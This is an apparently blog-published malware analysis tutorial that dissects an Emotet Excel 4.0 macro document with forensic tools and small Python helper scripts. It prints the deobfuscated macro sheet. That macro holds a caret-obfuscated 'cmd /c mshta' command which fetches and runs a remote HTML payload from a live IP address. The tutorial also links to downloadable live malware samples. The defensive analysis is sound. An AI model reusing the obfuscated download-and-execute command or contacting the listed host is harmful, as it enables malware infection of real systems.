Malicious Document Analysis: Emotet Case I

Baris Dincer
8 min read · Jun 27, 2024

In this article, we will conduct operational research on Emotet and analyze its capabilities as malware. All forensic examinations and artifact analyses will be carried out in a laboratory environment, using a real document created for an Emotet campaign.

Emotet is a sophisticated and modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Emotet typically spreads through malicious email attachments or links in phishing emails. These emails often use social engineering tactics to trick recipients into opening the attachments or clicking the links.

We will work with several artifacts in this research: an xlsm.bin file, a pcap, an html file, a PNG, and a bin file, all of which are evidence of Emotet activity. The files in the lab environment are real malicious files created for Emotet's operations.

You can obtain the malicious document from this source: https://tria.ge/samples/211216-2gvncachh8/sample.zip

Or you can browse: https://github.com/jstrosch/malware-samples/blob/master/maldocs/emotet/2021/December/sample_artifacts.zip

Please remember to perform your analysis in a virtual environment for security reasons.

Let’s work through this case step by step, starting by importing the documents into our secure virtual environment.

output

The first detail that catches the eye is that, as in most cases, the sample is labeled with its hash value so that it can be identified and analyzed by the community: d67193e7b4806640105a117a020ab6b0

Although this may seem similar to the MD5 format at first glance, we need to confirm it.

output

Yes, the hash value matches the MD family format (32 hexadecimal characters, 128 bits), which is consistent with MD5.
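
The same length check can be done offline. Below is a minimal Python sketch that uses only the standard library; the names guess_hash_type and md5_of_file are illustrative helpers, not part of any tool used in this article. A length match only shows that the value is consistent with a hash family, so recomputing the digest from the sample is the real confirmation.

```python
import hashlib
import re

# Hex digest lengths (in characters) of some common hash algorithms.
HEX_LENGTHS = {
    32: "MD5 (or another 128-bit digest such as MD4)",
    40: "SHA-1",
    64: "SHA-256",
}


def guess_hash_type(value: str) -> str:
    """Guess the hash family from the length of a hexadecimal string."""
    value = value.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", value):
        return "not a hex digest"
    return HEX_LENGTHS.get(len(value), "unknown")


def md5_of_file(path: str) -> str:
    """Compute the MD5 of a file in chunks, without loading it all at once."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


print(guess_hash_type("d67193e7b4806640105a117a020ab6b0"))
```

Inside the lab VM, calling md5_of_file on the sample and comparing the result with the file name confirms that the label really is the MD5 of the content.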

Determine the type and characteristics of the file.

output

The file is in the Microsoft Excel 2007+ format.
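
File-type identification of this kind starts from the first bytes of the file. The sketch below is a simplified illustration of that idea, not a replacement for a full identification tool: it only distinguishes the ZIP container used by Office 2007+ documents from the legacy OLE2 container. The function names are hypothetical.

```python
# Leading "magic" bytes of the two containers used by Office documents.
ZIP_MAGIC = b"PK\x03\x04"                        # Office 2007+ (OOXML) packages
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy OLE2 compound files


def container_type(header: bytes) -> str:
    """Classify a file by its first bytes."""
    if header.startswith(ZIP_MAGIC):
        return "zip"
    if header.startswith(OLE_MAGIC):
        return "ole"
    return "unknown"


def container_type_of_file(path: str) -> str:
    """Read only the first 8 bytes of a file and classify them."""
    with open(path, "rb") as handle:
        return container_type(handle.read(8))


print(container_type(b"PK\x03\x04\x14\x00\x06\x00"))
```

For an Excel 2007+ file such as this sample, container_type_of_file would be expected to return "zip".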

Now let’s see if there are any potential exploits identified for this version. You can use this link: https://www.exploit-db.com/search?q=Excel+2007

output

Pay attention to this detail: some malicious Office files exploit vulnerabilities in the application that opens them in order to compromise the system. Most of the vulnerabilities reported here are overflow-based. The malicious document we have may have relied on one of them, so make a note of this.

We need to find out whether this file we have is encrypted or not: msoffcrypto-tool -t -v d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

It is not encrypted, which is good news for us; otherwise, analyzing this file would be more laborious. If you encounter an encrypted document, research and use the msoffcrypto-crack tool.

Let’s get more detailed information about the document with exiftool: exiftool -a -u -g1 d67193e7b4806640105a117a020ab6b0.xlsm.bin

  • -a : Allow duplicate tags.
  • -u : Display unknown tags.
  • -g1 : Organize output by tag group (family 1, the specific location of each tag).
output

As you can see, there is a long printout with details.

It will be beneficial for you to examine some important details below:

  • File Name: d67193e7b4806640105a117a020ab6b0.xlsm.bin
  • File Size: 32 kB
  • File Modification Date/Time: 2021:12:18 21:38:48-05:00
  • File Permissions: -rw-rw-rw-
  • File Type: DOCX (despite the .xlsm.bin extension)
  • File Type Extension: docx
  • MIME Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
  • Creator: xXx
  • Last Modified By: xXx
  • Create Date: 2021:12:07 22:55:30Z
  • Modify Date: 2021:12:08 21:21:56Z
  • Application: Microsoft Excel
  • Document Security: None
  • App Version: 16.0300

Contained Files:

  • [Content_Types].xml
  • _rels/.rels
  • xl/workbook.xml
  • xl/_rels/workbook.xml.rels
  • xl/macrosheets/sheet1.xml
  • xl/worksheets/sheet1.xml
  • xl/worksheets/sheet2.xml
  • xl/worksheets/sheet3.xml
  • xl/theme/theme1.xml
  • xl/styles.xml
  • xl/drawings/drawing1.xml
  • xl/media/image1.png
  • xl/macrosheets/_rels/sheet1.xml.rels
  • xl/worksheets/_rels/sheet3.xml.rels
  • xl/drawings/_rels/drawing1.xml.rels
  • xl/printerSettings/printerSettings1.bin
  • docProps/core.xml
  • docProps/app.xml

We will refer back to these contained files.
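
Note that exiftool labels the package as DOCX, while the contained files sit under xl/, which points to Excel. A rough way to cross-check this is to look at the part names inside the ZIP container. The sketch below assumes the usual OOXML layout (xl/ for Excel, word/ for Word, ppt/ for PowerPoint); classify_ooxml is an illustrative helper, and the demo runs on a small in-memory archive rather than the real sample.

```python
import io
import zipfile


def classify_ooxml(names):
    """Guess the Office application from the part names in an OOXML package."""
    top_level = {name.split("/", 1)[0] for name in names}
    if "xl" in top_level:
        kind = "Excel workbook"
    elif "word" in top_level:
        kind = "Word document"
    elif "ppt" in top_level:
        kind = "PowerPoint presentation"
    else:
        kind = "unknown"
    # Excel 4.0 macro sheets are stored under xl/macrosheets/.
    macro_parts = sorted(
        name for name in names
        if name.startswith("xl/macrosheets/") and name.endswith(".xml")
    )
    return kind, macro_parts


# Demo archive with a few of the part names listed above (empty content).
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    for name in ("[Content_Types].xml", "xl/workbook.xml",
                 "xl/macrosheets/sheet1.xml",
                 "xl/macrosheets/_rels/sheet1.xml.rels"):
        archive.writestr(name, "")

with zipfile.ZipFile(buffer) as archive:
    kind, macro_parts = classify_ooxml(archive.namelist())

print(kind, macro_parts)
```

On the real sample, the same call would take zipfile.ZipFile(path).namelist() as input. The presence of xl/macrosheets/sheet1.xml is the first place to look for macro code.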

We need to see how the community has classified this MD5 hash: malwoverview.py -b 1 -B d67193e7b4806640105a117a020ab6b0

output
  • SHA-256: 60b238f32cb7814cf644f6b8d9d6d6576462b0b5ef10c03d608181ac88fe57f6
  • SHA-1: fdf3b9a1c83e68cc0dd69c80015822a044cbdc5a
  • MD5: d67193e7b4806640105a117a020ab6b0
  • First Seen: 2021-12-09 16:44:43
  • File Name: Data_01516.xlsm
  • File Size: 31,523 bytes
  • File Type: .xlsm
  • MIME Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet

Reported suspicious behaviors include:

  • Enumerating system info and physical storage devices
  • Modifying Internet Explorer settings
  • Creating hidden windows and synchronization primitives
  • Sending HTTP GET requests

As you may have noticed, the document acts as a trigger: when it is opened and the macro runs, it creates a connection request and a malicious file is transferred to the machine from another source.

This is valuable evidence. It means we need to analyze the network logs or traffic captures of a machine compromised by this attack, which is why we have the pcap file.

It is strongly recommended that you review the sandbox links below:

output

Here you can clearly see the features of this malicious file, the mechanisms it actively uses, and its general purpose.

output

That’s why using communities and online sandboxes is so important. We now have a lot of evidence and many details to investigate.

Let’s look at some other details: olevba -a d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

As we guessed, the olevba output indicates the presence of an Excel 4.0 (XLM) macro with suspicious characteristics. This type of macro is commonly used by malware authors, including those behind Emotet, to evade detection.

  • EXEC: This keyword suggests that the macro may run an executable file or a system command, which is a common tactic used by malicious macros to download or execute payloads.
  • IPv4 Address: The presence of 87[.]251[.]85[.]100 (DO NOT CONNECT OR CLICK) indicates a hardcoded IP address, possibly for Command and Control (C2) communication.
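
Indicators like this are written in defanged form so that nobody opens them by accident. The sketch below shows one way to convert between the two forms and to pull valid IPv4 addresses out of tool output. The helper names are hypothetical, and the bracket style simply follows the notation used in this article.

```python
import ipaddress
import re

# Loose pattern for dotted quads; candidates are validated afterwards.
IPV4_CANDIDATE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(text: str) -> str:
    """Turn '87[.]251[.]85[.]100' style notation back into plain text."""
    return text.replace("[.]", ".")


def defang(text: str) -> str:
    """Make an indicator non-clickable by bracketing every dot."""
    return text.replace(".", "[.]")


def find_ipv4(text: str) -> list:
    """Return the unique, valid IPv4 addresses found in the text."""
    found = []
    for candidate in IPV4_CANDIDATE.findall(text):
        try:
            ipaddress.IPv4Address(candidate)
        except ValueError:
            continue  # e.g. an octet above 255
        if candidate not in found:
            found.append(candidate)
    return found


report_line = "IPv4 Address: 87[.]251[.]85[.]100"
for address in find_ipv4(refang(report_line)):
    print(defang(address))
```

The refanged value only lives in memory; anything printed or written to a report goes through defang first.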

We need to extract the macro and analyze its content. Since olevba has already identified the stream containing the macro (xlm_macro.txt), we can use tools like xlmdeobfuscator to deobfuscate and inspect the macro code: xlmdeobfuscator -f d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

The IOC is now visible! You can also see the command passed to EXEC and the .html file it references.

Now save it: xlmdeobfuscator --file d67193e7b4806640105a117a020ab6b0.xlsm.bin --export-json /home/remnux/Desktop/malfiles_documents/emotet_case/xlsm_json_result.json

output

Let’s inspect that IOC: 87[.]251[.]85[.]100 (DO NOT CONNECT OR CLICK)

output

It has been flagged as malware or malicious by some vendors.

Now run oleid: oleid d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

As you can see, several indicators confirm that this file was built for malicious purposes.

Now try: oledump.py d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

Oops… The .xlsm file is in the OpenXML format, which is a ZIP container rather than an OLE file. For OpenXML formats, we need to extract the contents and look for the macros within the extracted files.

We can parse the content with a different method: binwalk --dd='.*' d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

Alternatively, we can simply use unzip to extract the contents: unzip d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

The extracted contents are now in our working directory.

output

Open the relevant .xml files and look for macro code. You can use grep to search for suspicious commands or keywords: grep -i -r "<.*>" .

output

It is quite long… But useful. Now use grep -r "EXEC"

output
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
mc:Ignorable="x14ac xr xr2 xr3 xr6"
xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3"
xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6"
xr6:uid="{83FE0663-A87E-40BB-8A6A-64B1D661DFF8}">
<dimension ref="J28:J51"/>
<sheetViews>
<sheetView showFormulas="1" workbookViewId="0">
<selection activeCell="A9" sqref="A9"/>
</sheetView>
</sheetViews>
<sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
<cols>
<col min="1" max="9" width="9.140625" style="1"/>
<col min="10" max="10" width="31.5703125" style="1" bestFit="1" customWidth="1"/>
<col min="11" max="16384" width="9.140625" style="1"/>
</cols>
<sheetData>
<row r="28" spans="10:10" x14ac:dyDescent="0.25">
<c r="J28" s="5" t="b">
<f bx="1">SSDGO="cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html"</f>
<v>1</v>
</c>
</row>
<row r="39" spans="10:10" x14ac:dyDescent="0.25">
<c r="J39" s="5">
<f>EXEC(SSDGO)</f>
<v>33</v>
</c>
</row>
<row r="51" spans="10:10" x14ac:dyDescent="0.25">
<c r="J51" s="5" t="b">
<f>HALT()</f>
<v>1</v>
</c>
</row>
</sheetData>
<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
<pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
  • Row 28: Defines a formula SSDGO="cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html" with a value of 1.
  • Row 39: Executes the EXEC function with the argument SSDGO.
  • Row 51: Halts the execution with the HALT function.

EXEC Function: In Excel 4.0 macros, this function starts an external program; here it runs the command string stored in SSDGO.

HALT Function: Used to stop further execution, potentially to evade detection or to prevent further actions once the intended task is complete.
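
The same walk through the macro sheet can be scripted. Below is a minimal sketch using Python's standard XML parser on a trimmed copy of the sheet shown above (only the cells with formulas are kept). extract_formulas and flag_suspicious are illustrative names, and the keyword list is an assumption covering a few XLM functions that are worth a closer look, not an exhaustive rule set.

```python
import xml.etree.ElementTree as ET

# Default namespace of the cell and formula elements in the macro sheet.
MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"

# Trimmed copy of xl/macrosheets/sheet1.xml (formatting attributes removed).
SAMPLE = '''<xm:macrosheet
 xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
<sheetData>
<row r="28"><c r="J28" s="5" t="b"><f bx="1">SSDGO="cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html"</f><v>1</v></c></row>
<row r="39"><c r="J39" s="5"><f>EXEC(SSDGO)</f><v>33</v></c></row>
<row r="51"><c r="J51" s="5" t="b"><f>HALT()</f><v>1</v></c></row>
</sheetData>
</xm:macrosheet>'''


def extract_formulas(xml_text):
    """Return (cell reference, formula text) pairs in document order."""
    root = ET.fromstring(xml_text)
    formulas = []
    for cell in root.iter("{%s}c" % MAIN_NS):
        formula = cell.find("{%s}f" % MAIN_NS)
        if formula is not None and formula.text:
            formulas.append((cell.get("r"), formula.text))
    return formulas


def flag_suspicious(formulas, keywords=("EXEC", "CALL", "REGISTER")):
    """Keep only the formulas that call one of the given XLM functions."""
    return [
        (ref, text) for ref, text in formulas
        if any(keyword + "(" in text.upper() for keyword in keywords)
    ]


formulas = extract_formulas(SAMPLE)
for ref, text in flag_suspicious(formulas):
    print(ref, text)
```

On the extracted sample, the input would be the text of xl/macrosheets/sheet1.xml read from disk instead of the SAMPLE string.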

The use of cmd /c shows that the macro runs a command through the Windows command interpreter. In this case, it tries to fetch content from http[:][//]87[.]251[.]85[.]100[/]PP[/]pp.html. (DO NOT BROWSE) This could be part of command-and-control (C2) communication or the download of additional payloads.

Specifically, in the macro snippet from sheet1.xml, SSDGO is assigned a value that includes a command to execute via cmd /c:

<c r="J28" s="5" t="b"><f bx="1">SSDGO="cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html"</f><v>1</v></c>
  • cmd /c: This is the Windows command to execute a command and then terminate.
  • m^sh^t^a: This is mshta (the Windows utility that runs HTML applications) obfuscated with the cmd.exe caret (^) escape character, likely to avoid straightforward detection by automated systems.
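
Removing the caret escapes is enough to recover the real command line. The sketch below is a simplified take on that step: it treats every caret as an escape for the character that follows it and ignores the special handling cmd.exe applies inside double quotes. The helper names are hypothetical.

```python
import re


def strip_cmd_carets(command: str) -> str:
    """Remove cmd.exe caret escapes: '^x' becomes 'x' and '^^' becomes '^'."""
    return re.sub(r"\^(.)", r"\1", command)


def extract_urls(text: str) -> list:
    """Return the http/https URLs found in the text."""
    return re.findall(r"https?://[^\s\"']+", text)


def defang_url(url: str) -> str:
    """Make a URL non-clickable before it goes into notes or reports."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


obfuscated = "cmd /c m^sh^t^a h^tt^p^:/^/87.251.85.100/PP/pp.html"
cleaned = strip_cmd_carets(obfuscated)

print(cleaned.split()[2])  # the program that cmd /c launches
for url in extract_urls(cleaned):
    print(defang_url(url))
```

The cleaned command makes the intent explicit: cmd launches mshta, and mshta is pointed at a remote .html file.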

We have this .html file among our artifacts.

output

Let’s take a quick look at the content.

output

The output may be long. It is recommended that you take a look at the details here.

We can also inspect the raw bytes of the document with xxd: xxd d67193e7b4806640105a117a020ab6b0.xlsm.bin

output

Use it on the target macro sheet: xxd sheet1.xml

output

The IOC is visible here.
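
For repeated searches, the same byte-level view can be scripted. The sketch below prints an xxd-like dump (the column layout is similar to xxd, not identical) and reports the offsets at which a byte pattern occurs; hexdump and find_offsets are illustrative names.

```python
def hexdump(data: bytes, width: int = 16) -> str:
    """Render bytes as offset, hex values, and printable ASCII."""
    pad = width * 3 - 1  # width of the hex column
    lines = []
    for offset in range(0, len(data), width):
        chunk = data[offset:offset + width]
        hex_part = " ".join(f"{byte:02x}" for byte in chunk)
        ascii_part = "".join(
            chr(byte) if 32 <= byte < 127 else "." for byte in chunk
        )
        lines.append(f"{offset:08x}: {hex_part:<{pad}}  {ascii_part}")
    return "\n".join(lines)


def find_offsets(data: bytes, needle: bytes) -> list:
    """Return every offset at which needle occurs in data."""
    offsets = []
    start = data.find(needle)
    while start != -1:
        offsets.append(start)
        start = data.find(needle, start + 1)
    return offsets


fragment = b"<f>EXEC(SSDGO)</f><v>33</v>"
print(hexdump(fragment))
print(find_offsets(fragment, b"EXEC"))
```

On the lab machine, the input would be the bytes of sheet1.xml read in binary mode. Searching the extracted sheet is the practical choice, because parts inside a ZIP container are normally stored compressed and their strings rarely appear in plain form in the container's raw bytes.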

Don’t give up on hacking.

Code for good.

^-^
